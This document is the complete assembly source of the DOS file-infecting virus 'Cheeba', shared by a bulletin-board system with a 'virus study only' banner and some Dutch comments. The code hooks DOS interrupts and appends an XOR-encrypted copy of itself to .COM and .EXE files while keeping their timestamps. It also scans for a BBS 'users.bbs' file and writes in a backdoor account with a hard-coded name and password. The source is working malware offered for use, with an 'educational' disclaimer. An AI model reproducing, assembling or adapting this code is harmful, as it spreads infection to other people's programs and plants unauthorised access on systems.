;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;
;*** The author of Cheeba let his source lie around --- so HERE IT IS!!! ***
; Btw just one thing --- I give it 2 you as long as you don't make a
; sucking destroying thing... Btw 2 this is of course only educational...
;-----------------------------------------------------------------------------
; Naam en password staan +- op lijn 200. Verander de low-version number
; bij de verschillende versies...
; Verander verder NIKS aan het virus !!!

Com_First:      push cs
S_1:            mov ax,100h
S_2:            push ax
                mov ax,cs
CodePars:       add ax,0
                push ax
S_3:            mov ax,offset End_Virus
S_4:            push ax
                retf

VirTitle        db 'CHEEBA Makes Ya High Harmlessly-1.2 F**K THE LAMERS'

I21Hooks        db 0
                dw offset Stop_Prg
                db 31h
                dw offset Stop_Prg
                db 4Ch
                dw offset Stop_Prg
                db 4Bh
                dw offset Start_Prg
                db 45h
                dw offset Check_Init
                db 3Ch
                dw offset Open_Wrt
                db 3Dh
                dw offset Open_Rd
                db 3Eh
                dw offset Check_Close
                db 40h
                dw offset Check_Vir

New_21:         call Rest_Orig_21
                call Save_Regs
                cld
                mov bx,offset I21Hooks
Srch_Fct_Lp:    cmp ah,[bx]
                jne Wrong_Fct
                push [bx+1]
                call Retr_Regs
                ret
Wrong_Fct:      add bx,3
                cmp bx,offset New_21
                jb Srch_Fct_Lp

Go_Dos:         call Retr_Regs
                call Call_Dos
Skip_21:        call Rest_21_Jmp
                retf 2

Call_Dos:       pushf
                db 09Ah
Org_21_Addr     dw 2 dup (?)
                ret

Org_21_Code     db 5 dup (?)

;*** Fct 45 - check init ***

Check_Init:     cmp bx,0D15h
                jne Go_Dos
                mov bx,0F0Ch
                jmp short Skip_21

;*** I21 FCT 3Dh - Open file for read ***

Open_Rd:        test al,3
                jz Go_Dos
                xchg si,dx
Get_0:          lodsb
                or al,al
                jnz Get_0
                mov cx,0Ah
                xor bx,bx
                xor ax,ax
                cwd        ; Dx = 0
Get_CSum:       dec si
                rol bx,1
                mov al,[si]
                or al,20h
                xor bl,al
                add dx,ax
                loop Get_CSum
                cmp bx,1AE7h
                jne Go_Dos
                cmp dx,3B7h
                jne Go_Dos

Is_Users:       mov word ptr cs:[Save_A_Reg],si
                mov di,offset Coded
Del_Si:         mov si,word ptr cs:[Save_A_Reg]
Lp_Unc:         lodsb
                or al,al
                jz Del_Si
                or al,20h
                sub byte ptr cs:[di],al
                inc di
                cmp di,offset No_Read
                jb Lp_Unc

Coded:          call Retr_Regs
                and al,0FEh
                or al,2
                call Call_Dos
                jnc Has_Read
                jmp No_Read
Has_Read:       pushf
                call Save_Regs
                xchg bx,ax
                mov ah,3Fh
                mov cx,9Eh
                mov dx,offset End_Virus
                call Call_Dos
                mov dx,[End_Virus+20h]
                mov cx,[End_Virus+22h]
                or cx,cx
                jnz Test_Ok
                or dx,dx
                jz No_XS_YET

Test_Ok:        mov ax,4200h
                call Call_Dos
                mov ah,3Fh
                mov dx,offset End_Virus+9Eh
                mov cx,9Eh
                call Call_Dos
                cmp ax,cx
                jnz No_XS_YET
                cmp byte ptr [End_Virus+9Eh],3
                jne No_XS_YET
                test byte ptr [End_Virus+9Eh+77h],1
                jnz No_XS_YET
                mov ax,[End_Virus+84h]
                cmp ax,[End_Virus+9Eh+84h]
                jne No_XS_YET
J_Less:         jmp Less_Users

No_XS_Yet:      mov ax,4202h
                xor cx,cx
                cwd   ; Dx = 0
                call Call_Dos
                or dx,dx
                jnz More_Users
                cmp ax,9Eh*50    ; 50 users of meer
                jb J_Less

More_Users:     mov cx,9Eh
                div cx
                or dx,dx
                jnz J_Less
                shr ax,1
                mul cx
                xchg cx,dx
                xchg dx,ax
                mov ax,4200h
                call Call_Dos
Read_Lp:        mov ah,3Fh
                mov dx,offset End_Virus+9Eh
                mov cx,9Eh
                call Call_Dos
                cmp ax,cx
                jne Less_Users
                test byte ptr [offset End_Virus+9Eh+77h],1 ; Search deleted
                je Read_Lp
                mov ax,4201h
                mov cx,-1
                mov dx,-9Eh
                call Call_Dos
                push dx
                push ax
                mov [End_Virus+20h],ax
                mov [End_Virus+22h],dx
                mov ax,4200h
                xor cx,cx
                cwd  ; dx = 0
                call Call_Dos
                mov ah,40h
                mov cx,9Eh
                mov dx,offset End_Virus
                call Call_Dos
                mov ax,4200h
                pop dx
                pop cx
                call Call_Dos
                push ds
                pop es
                mov al,0
                mov di,offset End_Virus
                mov cx,106h-9Eh
                repz stosb
                mov ax,2020h
                mov cx,5
Wrt_20s:        inc di
                stosw
                loop Wrt_20s

;HIER STAAN NAAM EN PASSWORD.
; Naam en password zijn 3 chars, Name = <N1><N2><N3> , Password = <P1><P2><P3>
; Zijn dus Name = 1F 20 7E, Password = 4D 5A B8
; Staan zoals hier:
;
; mov ..., 0 <N1> <NameLen = 3>
; ..... 0 <N3> <N2>
; Password:
; ..... ,0 <P1> <PassLen = 3>
; ..... ,0 <P3> <P2>
;
                mov word ptr [End_Virus],01F03h
                mov word ptr [End_Virus+2],07E20h
                mov word ptr [End_Virus+3Eh],04D03h
                mov word ptr [End_Virus+40h],0B85Ah


                mov ah,40h
                mov cx,9Eh
                mov dx,offset End_Virus
                call Call_Dos

Less_Users:     call Go_Beg_File
                popf
                call Retr_Regs
No_Read:        pushf
                push ax
                push si
                push di
                push ds
                mov di,offset Coded
Del_Si_2:       mov si,word ptr cs:[Save_A_Reg]
Lp_Unc_2:       lodsb
                or al,al
                jz Del_Si_2
                or al,20h
                add byte ptr cs:[di],al
                inc di
                cmp di,offset No_Read
                jb Lp_Unc_2

                pop ds
                pop di
                pop si
                pop ax
                popf

                call Rest_21_Jmp
                retf 2

;*** I 21 FCT 3C - Rewrite file ***

Open_Wrt:       cld
                test byte ptr cs:[Flags],1 ; Already sure-exec opened?
                jnz J_JD_2

                push ds
                pop es
                xchg di,dx
                mov al,0
                mov cx,-1
                repnz scasb
                mov ax,[di-5]
                or ax,2020h
                cmp ax,'c.'
                jne No_Com
                mov ax,[di-3]
                or ax,2020h
                cmp ax,'mo'
                jne Open_It
Sure_Exec:      or byte ptr cs:[Flags],1
Open_It:        call Retr_Regs
                call Call_Dos
                jc Not_Opened
                mov word ptr cs:[Exec_Handle],ax
Not_Opened:     call Rest_21_Jmp
                retf 2

No_Com:         cmp ax,'e.' ; '.E'?
                jne Open_It

                mov ax,[di-3]
                or ax,2020h
                cmp ax,'ex'   ; .. 'XE'?
                je Sure_Exec
OJ_2:           jmp short Open_It

;*** I21 FCT 3E - Infect on close if orig. prog has written too ***

Check_Close:    push cs
                pop ds
                cmp bx,[Exec_Handle]                                ; Same file?
J_JD_2:         jne JD_2
                mov word ptr [Exec_Handle],0FFFFh         ; Don't follow anymore
                call Go_Beg_File                            ; Go to beg. of file
                mov ah,3Fh                                    ; Read first bytes
                mov cx,18h
                mov dx,offset Read_Buf
                call Call_Dos
                and byte ptr [Flags],0FBh                         ; Flag for COM
                cmp word ptr [Read_Buf],'ZM'                         ; MZ - Exe?
                je Infect_Exe
                test byte ptr [Flags],1                             ; Sure exec?
                jnz Infect_Com
                and byte ptr cs:[Flags],0FEh
JD_2:           jmp Go_Dos

Infect_Exe:     or byte ptr [Flags],4                             ; Flag for EXE
                mov ax,[Read_Buf+16h]
                mov [Exe_CS+1],ax
                mov ax,[Read_Buf+14h]
                mov [Exe_IP+1],ax
                cmp ax,offset Init
                je OJ_2
                mov ax,[Read_Buf+0Eh]
                mov [Exe_SS+1],ax
                mov ax,[Read_Buf+10h]
                mov [Exe_SP+1],ax
Infect_Com:     and byte ptr [Flags],0FEh
                cmp word ptr [Read_Buf],0B80Eh
                je JD_2
                cmp word ptr [Read_Buf],0BFh
                je JD_2

Not_Inf:        mov ax,4202h                                 ; Go to end of file
                xor cx,cx
                cwd ; Dx = 0
                call Call_Dos

                test byte ptr [Flags],4
                jz No_Ovl_Test

                push ax                       ; .EXE: Test for internal overlays
                push dx
                mov cx,200h
                div cx
                cmp dx,[Read_Buf+2]
                jne Is_Ovl
                or dx,dx
                jz No_Corr_Chk
                inc ax
No_Corr_Chk:    cmp ax,[Read_Buf+4]
Is_Ovl:         pop dx
                pop ax
                je No_Ovl_Test

JD_3:           jmp short JD_2

No_Ovl_Test:    add ax,0Fh                                   ; End in paragraphs
                adc dx,0
                and ax,0FFF0h

                mov Org_Fl_Len_Lo,ax
                mov Org_Fl_Len_Hi,dx

                push ax
                mov cl,4
                shr ax,cl
                mov [CodePars+1],ax
                or al,al
                jnz No_Al_0
                dec al
No_Al_0:        mov byte ptr [offset S_5-1],al
                pop ax

                push ax
                push dx

                mov cx,dx                              ; Go to end-in-paragraphs
                mov dx,ax
                mov ax,4200h
                call Call_Dos

                push cs
                pop es
                mov si,100h
                mov di,offset End_Virus
                mov cx,offset End_Virus-100h
                mov dl,byte ptr cs:[offset S_5-1]
Code_Lp:        lodsb
                cmp si,offset Init
                ja No_Code
                xor al,dl
No_Code:        stosb
                loop Code_Lp

                mov ax,5700h
                call Call_Dos
                mov Org_Fl_Time,cx
                mov Org_Fl_Date,dx

                mov ah,40h                          ; Write virus behind program
                mov cx,offset End_Virus-100h
                mov dx,offset End_Virus
                call Call_Dos

                call Go_Beg_File

                mov dx,offset Com_First
                mov cx,10h

                pop si
                pop ax

                test byte ptr [Flags],4
                jz Init_Com

                mov dx,si
                mov cx,4
Get_CS:         shr dx,1
                rcr ax,1
                loop Get_CS

                sub ax,[Read_Buf+8]                              ; - header size
                sub ax,10h
                mov [Read_Buf+16h],ax
                mov [Read_Buf+0Eh],ax
                mov word ptr [Read_Buf+14h],offset Init
                mov word ptr [Read_Buf+10h],offset End_Virus+100h

                mov ax,Org_Fl_Len_Lo
                mov dx,Org_Fl_Len_Hi

                add ax,offset End_Virus-100h
                adc dx,0
                mov cx,200h
                div cx
                or dx,dx
                jz No_Corr
                inc ax
No_Corr:        mov [Read_Buf+2],dx
                mov [Read_Buf+4],ax
                mov dx,offset Read_Buf
                mov cx,18h

Init_Com:       mov ah,40h
                call Call_Dos

                mov ax,5701h
                mov cx,Org_Fl_Time
                mov dx,Org_Fl_Date
                call Call_Dos

JD_4:           jmp short JD_3


;*** 00 / 31 / 4C: End program ***

Stop_Prg:       push ds
                push bx
                lds bx,cs:[Jmp_22+1]
                cli
                mov byte ptr [bx],0EAh
                mov word ptr [bx+1],offset Int_22
                mov word ptr [bx+3],cs
                sti
                pop bx
                pop ds
                jmp short JD_4

Int_22:         call Rest_21_Jmp
                push cs
                pop ds
                les di,dword ptr [Jmp_22+1]
                mov si,offset Org_22
                call Move_Bytes
                call Retr_Regs
Jmp_22:         jmp 0:0

Org_22          db 5 dup (?)

;*** Start prog ***

Start_Prg:      lds bx,cs:[Jmp_13+1]
                cli
                mov byte ptr [bx],0EAh
                mov word ptr [bx+1],offset Int_13
                mov word ptr [bx+3],cs
                sti
                call Retr_Regs
JD_5:           jmp short JD_4

Int_13:         call Rest_21_Jmp
                push si
                push di
                push ds
                push es
                push cs
                pop ds
                les di,dword ptr [Jmp_13+1]
                mov si,offset Org_13
                call Move_Bytes
                pop es
                pop ds
                pop di
                pop si
Jmp_13:         jmp 0:0

Org_13          db 5 dup (?)

;*** Check for string 'iru' (vIRUs) ***

Check_Vir:      cmp bx,cs:[Exec_Handle]
                jne No_Vir
                sub cx,2
                jc No_Vir
                push ds
                pop es
                mov di,dx
                mov al,'i'
Iru_Lp:         repnz scasb
                jnz No_Vir
                cmp word ptr [di],'ur'
                jne Iru_Lp
                mov word ptr cs:[Exec_Handle],0FFFFh
                and byte ptr cs:[Flags],0FEh
No_Vir:         jmp short JD_5


Move_Bytes:     cli
                cld
                movsw
                movsw
                movsb
                sti
                ret

Rest_Orig_21:   push si
                push di
                push ds
                push es
                push cs
                pop ds
                mov si,offset Org_21_Code
                les di,dword ptr [Org_21_Addr]
                call Move_Bytes
                pop es
                pop ds
                pop di
                pop si
                ret

Rest_21_Jmp:    push ds
                push bx
                lds bx,dword ptr cs:[Org_21_Addr]
                cli
                mov byte ptr [bx],0EAh
                mov word ptr [bx+1],offset New_21
                mov word ptr [bx+3],cs
                sti
                pop bx
                pop ds
                ret

;*** Proc: Save regs ***

Save_Regs:      mov word ptr cs:[Save_Ds],ds
                push cs
                pop ds
                mov word ptr [Save_Ax],ax
                mov word ptr [Save_Bx],bx
                mov word ptr [Save_Cx],cx
                mov word ptr [Save_Dx],dx
                mov word ptr [Save_Si],si
                mov word ptr [Save_Di],di
                mov word ptr [Save_Es],es
                ret

Retr_Regs:      push cs
                pop ds
                mov ax,word ptr [Save_Ax]
                mov bx,word ptr [Save_Bx]
                mov cx,word ptr [Save_Cx]
                mov dx,word ptr [Save_Dx]
                mov si,word ptr [Save_Si]
                mov di,word ptr [Save_Di]
                mov es,word ptr [Save_Es]
                mov ds,word ptr [Save_Ds]
                ret

Go_Beg_File:    mov ax,4200h
                xor cx,cx
                cwd ; dx = 0
                call Call_Dos
                ret

Exec_Handle     dw 0FFFFh              ; Handle of opened-with-write- exec. file

Flags           db (?) ; Flags: 1 = Sure exec (- Maybe data)
                              ; 4 = EXE-file (- COM)

Org_Fl_Len_Lo   dw (?)
Org_Fl_Len_Hi   dw (?)

Org_Fl_Time     dw (?)
Org_Fl_Date     dw (?)

Save_Ax         dw (?)
Save_Bx         dw (?)
Save_Cx         dw (?)
Save_Dx         dw (?)
Save_Si         dw (?)
Save_Di         dw (?)
Save_Ds         dw (?)
Save_Es         dw (?)

Save_A_Reg      dw (?)

Decoded:        mov word ptr cs:[Save_A_Reg],ds
                push ax
                push bx
                push cx
                push dx
                push ds
                push es

                mov ah,45h
                mov bx,0D15h
                int 21h
                cmp bx,0F0Ch
                jne N_Y_Inst
                jmp Jmp_No_Init
N_Y_Inst:       cld

                xor ax,ax
                mov ds,ax

                mov ax,[88h]                                     ; Save I22 addr
                mov cs:[Jmp_22+1],ax
                mov ax,[8Ah]
                mov cs:[Jmp_22+3],ax

                mov ax,[04Ch]                                    ; Save I13 addr
                mov cs:[Jmp_13+1],ax
                mov dx,[04Eh]
                mov cs:[Jmp_13+3],dx

                mov ah,52h
                int 21h
                cmp dx,es:[bx-2]
                jnb Jmp_No_Init

                push [84h]
                push [86h]

                push cs
                pop ds

                push cs
                pop es

                mov si,offset Com_First
                mov di,offset Com_Start_2

MoveStrt:       lodsw                           ; Other .COM start-up
                cmp si,offset CodePars+3
                je No_MS_Lp
                xchg ax,[di]
                mov [si-2],ax
                inc di
                inc di
No_MS_Lp:       cmp si,offset VirTitle
                jb MoveStrt

                xor byte ptr [Init],1
                xor byte ptr [S_9],6Ch
                xor byte ptr [Decode_Lp+2],1
                xor byte ptr [S_5],1
                xor byte ptr [S_6+1],1
                xor byte ptr [S_7],7
                xor byte ptr [S_8],6Ch ; Nop <> CLD

                mov ax,word ptr cs:[Save_A_Reg]
                dec ax
MCB_Loop:       mov ds,ax
                cmp byte ptr [0],'Z'
                je Found_End_MCB
                add ax,[3]
                inc ax
                cmp ah,0A0h
                jb MCB_Loop
                add sp,4
Jmp_No_Init:    jmp short No_Init

Found_End_MCB:  mov bx,[3]
Here_Pars:      sub bx,100h ; Filled in init-proc.
                jc No_Init
                mov [3],bx
                add ax,bx
                inc ax
                mov ds,cs:[Save_A_Reg]
                mov word ptr [2],ax
                sub ax,10h
                mov cx,offset End_Virus-100h
                push cs
                pop ds
                mov es,ax
                mov si,100h
                mov di,si
                repz movsb

                pop ds
                pop si

                mov es:[Org_21_Addr],si
                mov es:[Org_21_Addr+2],ds

                mov di,offset Org_21_Code

                call Move_Bytes

                cli
                mov byte ptr [si-5],0EAh
                mov word ptr [si-4],offset New_21
                mov word ptr [si-2],es
                sti

                lds si,cs:[Jmp_22+1]
                mov di,offset Org_22

                call Move_Bytes

                lds si,cs:[Jmp_13+1]
                mov di,offset Org_13

                call Move_Bytes

No_Init:        pop es
                pop ds
                pop dx
                pop cx
                pop bx
                pop ax

                test cs:Flags,4
                jnz Rest_Stack

                push ds
                push cs
                pop ds
                mov cx,10h
                mov si,offset Read_Buf
                mov di,100h
                repz movsb
                pop ds
                retf

Rest_Stack:     mov ax,ds       ; Stack restore for .EXE files
Exe_SS:         add ax,0
                add ax,10h
                cli
                mov ss,ax
Exe_SP:         mov sp,0
                sti
                mov ax,ds
Exe_Cs:         add ax,0
                add ax,10h
                push ax
Exe_Ip:         mov ax,0
                push ax
                retf

Com_Start_2:    mov di,100h
                push cs
                mov ax,cs
                push di
                db 05h                  ; Add Ax,xxxx
                mov di,offset Init
                push ax
                push di
                retf

;*** INIT - ONLY DECODE - PART ***

Init:           mov si,offset Com_First
S_9:            cld
Decode_Lp:      xor byte ptr cs:[si],0
S_5:            inc si
S_6:            cmp si,offset Init
S_7:            jne Decode_Lp
S_8:            nop
                jmp Decoded

Read_Buf        db 0CDh,20h
                db 16h dup (?)

End_Virus:      cld
                mov word ptr [S_3+1],offset Init
           mov word ptr [Here_Pars+2],(((offset End_Virus-101h) shr 4) +1) shl 1
                mov di,offset Coded
New_Us:         mov si,offset User_St
B_V_CLp:        lodsb
                or al,al
                jz New_Us
                add [di],al
                inc di
                cmp di,offset No_Read
                jb B_V_CLp
                jmp Init

User_St         db 'users.bbs',0

;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;

;�������������������������������������������������������������������������;
;������������������> and Remember Don't Forget to Call <������������������;
;������������> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <����������;
;�������������������������������������������������������������������������;